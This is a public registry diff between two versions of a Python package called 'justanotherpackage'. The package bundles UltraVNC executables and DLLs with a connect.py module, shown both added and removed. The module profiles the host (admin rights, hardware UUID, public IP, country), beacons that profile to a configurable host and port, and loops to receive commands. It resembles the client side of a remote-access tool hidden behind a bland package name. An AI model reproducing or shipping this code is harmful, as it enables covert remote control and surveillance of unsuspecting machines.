justanotherpackage 0.1.5__tar.gz → 0.1.7__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/PKG-INFO +1 -1
- justanotherpackage-0.1.7/justanotherpackage/connect.py +60 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage.egg-info/PKG-INFO +1 -1
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/setup.py +1 -1
- justanotherpackage-0.1.5/justanotherpackage/connect.py +0 -79
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/MANIFEST.in +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/__init__.py +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/core.py +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/SecureVNCPlugin.dsm +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/UVncVirtualDisplay/UVncVirtualDisplay.dll +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/UVncVirtualDisplay/UVncVirtualDisplay.inf +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/UVncVirtualDisplay/uvncvirtualdisplay.cat +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/UltraVNC.ini +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/ddengine.dll +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/logging.dll +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/vnchooks.dll +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/winvnc.exe +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage.egg-info/SOURCES.txt +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage.egg-info/dependency_links.txt +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage.egg-info/top_level.txt +0 -0
- {justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/setup.cfg +0 -0
@@ -0,0 +1,60 @@
|
|
1
|
+
|
2
|
+
import socket
|
3
|
+
import time
|
4
|
+
import platform
|
5
|
+
import ctypes
|
6
|
+
import requests
|
7
|
+
from wmi import WMI
|
8
|
+
|
9
|
+
def check_account_type():
|
10
|
+
try:
|
11
|
+
if ctypes.windll.shell32.IsUserAnAdmin() != 0:
|
12
|
+
return "Admin"
|
13
|
+
else:
|
14
|
+
return "User"
|
15
|
+
except Exception:
|
16
|
+
return "None"
|
17
|
+
|
18
|
+
def get_client_info():
|
19
|
+
system = platform.system()
|
20
|
+
version = platform.version().split('.')[0]
|
21
|
+
os = f"{system} {version}"
|
22
|
+
response = requests.get('https://ipapi.co/json/')
|
23
|
+
data = response.json()
|
24
|
+
ip = data.get('ip')
|
25
|
+
country = data.get('country_name')
|
26
|
+
|
27
|
+
client_info = {
|
28
|
+
"IP": ip,
|
29
|
+
"PC Name": platform.node(),
|
30
|
+
"PC ID": WMI().Win32_ComputerSystemProduct()[0].UUID,
|
31
|
+
"OS": os,
|
32
|
+
"Account Type": check_account_type(),
|
33
|
+
"Country": country,
|
34
|
+
"Tag": "Remote PC",
|
35
|
+
}
|
36
|
+
return client_info
|
37
|
+
|
38
|
+
def start_connection(HOST, PORT):
|
39
|
+
while True:
|
40
|
+
try:
|
41
|
+
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
42
|
+
client_socket.connect((HOST, PORT))
|
43
|
+
client_info = get_client_info()
|
44
|
+
client_socket.sendall(str(client_info).encode('utf-8'))
|
45
|
+
print(f"{client_info} sent to: {HOST}:{PORT}")
|
46
|
+
handle_connection(client_socket)
|
47
|
+
except Exception as e:
|
48
|
+
print(e)
|
49
|
+
time.sleep(5)
|
50
|
+
finally:
|
51
|
+
client_socket.close()
|
52
|
+
|
53
|
+
def handle_connection(client_socket):
|
54
|
+
try:
|
55
|
+
while True:
|
56
|
+
command = client_socket.recv(1024).decode('utf-8').strip()
|
57
|
+
if command:
|
58
|
+
client_socket.sendall(f"Command executed successfully: {command}\n".encode('utf-8'))
|
59
|
+
except:
|
60
|
+
client_socket.close()
|
@@ -1,79 +0,0 @@
|
|
1
|
-
|
2
|
-
import socket
|
3
|
-
import time
|
4
|
-
import platform
|
5
|
-
import ctypes
|
6
|
-
import threading
|
7
|
-
import requests
|
8
|
-
from wmi import WMI
|
9
|
-
import os
|
10
|
-
|
11
|
-
def check_account_type():
|
12
|
-
try:
|
13
|
-
if ctypes.windll.shell32.IsUserAnAdmin() != 0:
|
14
|
-
return "Admin"
|
15
|
-
else:
|
16
|
-
return "User"
|
17
|
-
except Exception:
|
18
|
-
return "None"
|
19
|
-
|
20
|
-
def get_client_info():
|
21
|
-
system = platform.system()
|
22
|
-
version = platform.version().split('.')[0]
|
23
|
-
os = f"{system} {version}"
|
24
|
-
response = requests.get('https://ipapi.co/json/')
|
25
|
-
data = response.json()
|
26
|
-
ip = data.get('ip')
|
27
|
-
country = data.get('country_name')
|
28
|
-
|
29
|
-
client_info = {
|
30
|
-
"IP": ip,
|
31
|
-
"PC Name": platform.node(),
|
32
|
-
"PC ID": WMI().Win32_ComputerSystemProduct()[0].UUID,
|
33
|
-
"OS": os,
|
34
|
-
"Account Type": check_account_type(),
|
35
|
-
"Country": country,
|
36
|
-
"Tag": "Remote PC",
|
37
|
-
}
|
38
|
-
return client_info
|
39
|
-
|
40
|
-
def save_connection_info(PATH, HOST, PORT):
|
41
|
-
if not os.path.exists(PATH):
|
42
|
-
with open(PATH, 'w') as f:
|
43
|
-
f.write(f"{HOST}:{PORT}\n")
|
44
|
-
|
45
|
-
def get_connection_info(PATH):
|
46
|
-
if os.path.exists(PATH):
|
47
|
-
with open(PATH, 'r') as f:
|
48
|
-
connection_info = f.readline().strip()
|
49
|
-
HOST, PORT = connection_info.split(':')
|
50
|
-
return HOST, int(PORT)
|
51
|
-
else:
|
52
|
-
return None, None
|
53
|
-
|
54
|
-
def start_connection(PATH=None, HOST=None, PORT=None):
|
55
|
-
if HOST is None and PORT is None:
|
56
|
-
HOST, PORT = get_connection_info(PATH)
|
57
|
-
if HOST and PORT:
|
58
|
-
save_connection_info(PATH, HOST, PORT)
|
59
|
-
while True:
|
60
|
-
try:
|
61
|
-
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
62
|
-
client_socket.connect((HOST, PORT))
|
63
|
-
client_info = get_client_info()
|
64
|
-
client_socket.sendall(str(client_info).encode('utf-8'))
|
65
|
-
threading.Thread(target=handle_connection, args=(HOST, PORT)).start()
|
66
|
-
handle_connection(client_socket)
|
67
|
-
except:
|
68
|
-
time.sleep(5)
|
69
|
-
finally:
|
70
|
-
client_socket.close()
|
71
|
-
|
72
|
-
def handle_connection(client_socket):
|
73
|
-
try:
|
74
|
-
while True:
|
75
|
-
command = client_socket.recv(1024).decode('utf-8').strip()
|
76
|
-
if command:
|
77
|
-
client_socket.sendall(f"Command executed successfully: {command}\n".encode('utf-8'))
|
78
|
-
except:
|
79
|
-
client_socket.close()
|
File without changes
|
File without changes
|
File without changes
|
{justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage/vnc/SecureVNCPlugin.dsm
RENAMED
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
{justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage.egg-info/SOURCES.txt
RENAMED
File without changes
|
File without changes
|
{justanotherpackage-0.1.5 → justanotherpackage-0.1.7}/justanotherpackage.egg-info/top_level.txt
RENAMED
File without changes
|
File without changes
|